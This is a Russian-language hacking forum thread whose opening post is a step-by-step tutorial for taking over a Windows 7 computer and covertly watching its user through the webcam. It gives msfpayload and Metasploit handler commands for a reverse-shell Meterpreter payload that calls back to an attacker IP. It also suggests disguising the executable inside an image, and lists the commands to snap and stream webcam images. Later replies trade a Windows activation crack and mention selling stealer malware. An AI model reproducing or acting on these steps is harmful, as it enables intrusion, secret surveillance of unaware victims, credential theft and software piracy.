1
  1. Этот сайт использует файлы cookie. Продолжая пользоваться данным сайтом, Вы соглашаетесь на использование нами Ваших файлов cookie. Узнать больше.
Приветствуем вас,Гость, на форуме IFUD.WS. Обязательно рекомендуется к прочтению правила форума http://ifud.ws/threads/obnovleno-pravila-foruma.7759

Взлом Windows 7 (подсматриваем через web-камеру)

Тема в разделе "Чужие", создана пользователем }{OTT@BY4, 4 янв 2013.

1. TopicStarter Overlay
    }{OTT@BY4

}{OTT@BY4 Гость

Всем привет!
    Давайте сегодня поговорим об одном из возможных взломов Windows 7, плюс ко всему будем подглядывать через web-камеру.
    Web-камера давным давно стала неотъемлемой частью аппаратного обеспечения компьютера и не важно ноутбук это или стационар. К тому же большой процент пользователей до сих пор используют Windows XP и Windows 7, на которые уязвимостей выше крыши. Ко всему этому можно добавить неумение пользователями настраивать свою ОС, что уже играет немаловажную роль!
    Итак, давайте воспользуемся одной из давно найденных, но до сих пор работающих уязвимостей для Windows 7, которая затрагивает UAC (User Account Control). Он ней вы можете прочитать:
    • Please login or register to view links
    Для начала нам нужно, создать вредоносный исполняемый файл run_me.exe, который в BackTrack создается так, как показано ниже:
    # msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=4444 X > /root/Desktop/run_me.exe
    • LHOST=192.168.1.5 – IP-адрес атакующего
    • LPORT=4444 – порт атакующего
    Запускаем Metasploit:
    # msfconsole
    Далее вводим команды:
    > use exploit/multi/handler > set payload windows/meterpreter/reverse_tcp > set lhost 192.168.1.5 > exploit
    Теперь нам нужно, что пользователь запустил файл run_me.exe. Как это добиться уже другая история, как вариант можно засунуть вредоносный файл в другой файл. Например, как скрыть/склеить exe-файл в jpg можете прочитать Please login or register to view links. Это не единственный вариант, поэтому вооружайтесь googl’ом.
    После того, когда жертва запустит файл, мы получим контроль над системой с привилегиями SYSTEM. Теперь можно делать все, что угодно! Но сейчас будем подсматривать за пользователем.
    Сначала посмотрим, есть ли вообще у него web-камера?
    meterpreter > webcam_list 1: Logitech Webcam 120
    Да нам повезло! Имеется одна web-камера: Logitech Webcam 120.
    Теперь сделаем снимок:
    meterpreter > webcam_snap

Так же можно попробовать запустить web-камеру в режиме реального времени. Делается это следующей командой:
    meterpreter > run webcam -p /var/www
    После чего откроется браузер и вы будете видеть то, что видит камера. Если браузер не откроется, значит откройте его сами и в адресной строке введите:
    /var/www/webcam.html
    На этом все! Как видите ничего сложного нет. Если возникнут вопросы, обращайтесь.

• Like Like x 8
    Метки:
  2. TopicStarter Overlay
    RANGERok

RANGERok Гость

А можно ломануть ключ лицензии на windows7 Профиссиональная? А то меня уже накаляет стандартная картинка

3. TopicStarter Overlay
    }{OTT@BY4

}{OTT@BY4 Гость

НУб пропатчь:))

• Like Like x 2
  4. Prince

Prince

Симпатии:
    231
    Да, ломать ещё нужно всю ось! А лучше скачать патч)

• Like Like x 1
  5. TopicStarter Overlay
    RANGERok

RANGERok Гость

Но.... я же не знаю чо да как

6. SAIND

SAIND

Симпатии:
    606
    У менять есть взломшик винды 7, я у себя так лицензионную винду ломаю если надо выложу мне жаоко,

• Like Like x 1
  7. TopicStarter Overlay
    RANGERok

RANGERok Гость

Надо!

8. SAIND

SAIND

Симпатии:
    606
    Ша кину
    --- добавлено: 4 янв 2013 в 22:36 ---
    Взломщик винды 7 .
    Нажимаем кнопку активировать и ждём (Я жду примерно 3 минуты "В зависимости от вашей тачки ")
    Потом вылетает перезагрузить перезагружаешь и все лицензия готова даже можно обновляться с майкрософт ток я не обновляюсь .
    Please login or register to view links

• Like Like x 1
  9. TopicStarter Overlay
    RANGERok

RANGERok Гость

А толку то с активирования этого? Мне надо винду Домашнюю, профиссиональную, Максимальную там и т.п.

10. SAIND

SAIND

Симпатии:
    606
    Я себе лицензионную винду им активирую Винда 7 Максимальная ,мне другой и не надо .

11. TopicStarter Overlay
    RANGERok

RANGERok Гость

У меня начальная, а я хочу Максималную, вот в этом то и проблема

12. SAIND

SAIND

Симпатии:
    606
    У меня есть диск ,ток он покоцанный я пытался с него оброс снять не получается диск чучуть поцарапанный но лицензия .

13. трахтенберг

трахтенберг

Симпатии:
    197
    со стиллеров попробуй)) я даже как-то их продавал))

Поделиться этой страницей

Загрузка...